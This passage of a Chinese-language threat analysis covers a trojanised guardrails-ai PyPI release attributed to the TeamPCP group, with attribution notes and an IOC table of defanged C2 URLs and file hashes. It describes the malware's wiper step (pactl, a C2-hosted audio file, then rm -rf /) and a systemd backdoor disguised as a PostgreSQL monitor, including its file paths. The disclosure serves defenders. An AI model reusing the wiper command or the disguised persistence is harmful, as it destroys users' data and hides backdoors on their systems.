14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pactl</span></code><span leaf=""> 设置系统音量至 100% 并播放 C2 上的音频文件 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">RunForCover.mp3</span></code><span leaf="">，随后执行 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">rm -rf /</span></code><span leaf="">。</span></p><h3 data-line="288" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">6.3 持久化后门：伪装 PostgreSQL 监控</span></h3><p data-line="290" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">其余情况下，调用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">deploy_local()</span></code><span leaf=""> 植入 systemd 持久化后门：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">root    </span><span style="color: rgb(76, 129, 201);"><span leaf="">→</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">/usr/</span></span><span leaf="">bin</span><span style="color: rgb(0, 72, 171);"><span leaf="">/pgmonitor.py + /</span></span><span leaf="">etc</span><span style="color: rgb(0, 72, 171);"><span leaf="">/systemd/</span></span><span leaf="">system</span><span style="color: rgb(76, 129, 201);"><span leaf="">/</span></span><span leaf="">pgsql</span><span style="color: rgb(76, 129, 201);"><span leaf="">-</span></span><span leaf="">monitor.service</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">非 root </span><span style="color: rgb(76, 129, 201);"><span leaf="">→</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">~/</span></span><span leaf="">.local</span><span style="color: rgb(0, 72, 171);"><span leaf="">/bin/</span></span><span leaf="">pgmonitor.py </span><span style="color: rgb(76, 129, 201);"><span leaf="">+</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">~/</span></span><span leaf="">.config</span><span style="color: rgb(0, 72, 171);"><span leaf="">/systemd/</span></span><span leaf="">user</span><span style="color: rgb(76, 129, 201);"><span leaf="">/</span></span><span leaf="">pgsql</span><span style="color: rgb(76, 129, 201);"><span leaf="">-</span></span><span leaf="">monitor.service</span></p></code></pre></p><p data-line="297" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">服务描述伪装为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">&#34;PostgreSQL Monitor&#34;</span></code><span leaf="">，设置 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Restart=always</span></code><span leaf="">。文件名 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pgmonitor.py</span></code><span leaf=""> 与 TeamPCP 此前使用的 CanisterWorm 蠕虫中 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pgmon</span></code><span leaf=""> 伪装名如出一辙。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="301" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">七、完整攻击链全景</span></h2><figure data-line="303" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img class="rich_pages wxw-img" data-ratio="0.562962962962963" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028249" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=411ee7e1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXBfd0Y0M7ibrJT9lnQxIxBs4lQHPibyAIiapRNvaBfzzCvlESwZodKOPR3hTQmQ02vZRYAtv7oWSo1RECmiah2UZ4htuwMaPCLRHE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="307" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">八、威胁组织画像：TeamPCP</span></h2><h3 data-line="309" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">8.1 组织概况</span></h3><p data-line="311" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">TeamPCP（别名 PCPcat、ShellForce、DeadCatx3）是一个自 2025 年 9 月起活跃的供应链攻击组织，被 Palo Alto Unit 42、Wiz、JFrog、Datadog 等多家安全厂商持续追踪。据 Unit 42 引述，该组织已入侵超 50 万台机器，窃取超 300GB 凭据数据。</span></p><h3 data-line="313" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">8.2 历史攻击事件</span></h3><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2812.47px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p style="text-align: left;"><span leaf="">    时间</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p style="text-align: left;"><span leaf="">     目标</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p style="text-align: left;"><span leaf="">    生态</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">2025-12</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">云原生主机（React2Shell）</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">漏洞利用</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">2026-03-19</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Aqua Trivy（76/77 个 tag）</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">GitHub Actions</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">2026-03-21</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Checkmarx KICS（35 个 tag）</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">GitHub Actions</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">2026-03-23</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">LiteLLM 1.82.7/1.82.8（9500 万月下载）</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">PyPI</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">2026-03-27</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Telnyx 4.87.1/4.87.2</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">PyPI</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">2026-04-22</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Xinference 2.6.x</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">PyPI</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">2026-05-11</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">TanStack 42 个包/84 个版本</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">npm</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2026-05-12</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">guardrails-ai 0.10.1</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">PyPI</span></strong></td></tr></tbody></table></p><h3 data-line="326" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">8.3 归因关联</span></h3><p data-line="328" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">本次事件与 TeamPCP 存在 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">12 个独立关联点</span></strong><span leaf="">，其中 10 个直接匹配：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">署名</span></strong><span leaf="">，LICENSE 中 ASCII art 为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">TeamPCP</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">C2 IP</span></strong><span leaf="">，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">83[.]142.209.194</span></code><span leaf=""> 与已知 IoC </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">83[.]142.209.203</span></code><span leaf=""> 同一 /24 网段</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">域名仿冒</span></strong><span leaf="">，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">git-tanstack[.]com</span></code><span leaf=""> — TanStack npm 攻击（05-11）仅早一天</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">持久化伪装</span></strong><span leaf="">，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pgmonitor.py</span></code><span leaf=""> — 与 CanisterWorm 的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pgmon</span></code><span leaf=""> 一致</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">systemd 路径</span></strong><span leaf="">，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.config/systemd/user/</span></code><span leaf=""> — 与 LiteLLM Stage 3 的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">sysmon.py</span></code><span leaf=""> 同一路径模式</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">俄语豁免</span></strong><span leaf=""> / </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">条件性 wiper</span></strong><span leaf=""> / </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">GitHub Dead Drop</span></strong><span leaf=""> / </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">GitHub 外泄</span></strong><span leaf=""> 等均与已知 TTP 吻合</span></p></li></ul><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="339" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">九、IOC</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2812.47px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类别</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类型</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">值</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">网络</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Domain</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">git-tanstack[.]com</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">网络</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">IP</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">83.142.209[.]194</span></code><p><span leaf="">（Ukraine, Kyiv, AS205759）</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">网络</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">hxxps://git-tanstack[.]com/transformers.pyz</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">网络</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">hxxps://83.142.209[.]194/v1/models</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">网络</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">hxxps://83.142.209[.]194/v1/weights</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">网络</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">hxxps://83.142.209[.]194/audio.mp3</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">网络</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">GitHub</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Commit search keyword: </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">FIRESCALE</span></code></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">SHA256</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">b76c800a685c0376a668170b000ba1e5a5ac7daeb714a6af97eac2d31d9a8dbc</span></code><p><span leaf="">（guardrails_ai-0.10.1-py3-none-any.whl）</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">SHA256</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">8491b17dc16f31c27f290b3b1e0f2e8866cc775828590e90376ecfb0cc1f8d9c</span></code><p><span leaf="">（guardrails_ai-0.10.1.tar.gz）</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">SHA256</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0f35abda19fb69430c32228465396094b866d887427bf551e353ab31256a9dd6</span></code><p><span leaf="">（transformers.pyz）</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">SHA256</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">93f0791d596816985832f32ea8690bd3dceba95cf851a46fe5e644e50651ed7b</span></code><p><span leaf="">（guardrails/</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf=""><span textstyle="" style="font-weight: normal;">init</span></span></strong><span leaf="">.py 恶意版）</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">主机</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/tmp/transformers.pyz</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">主机</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 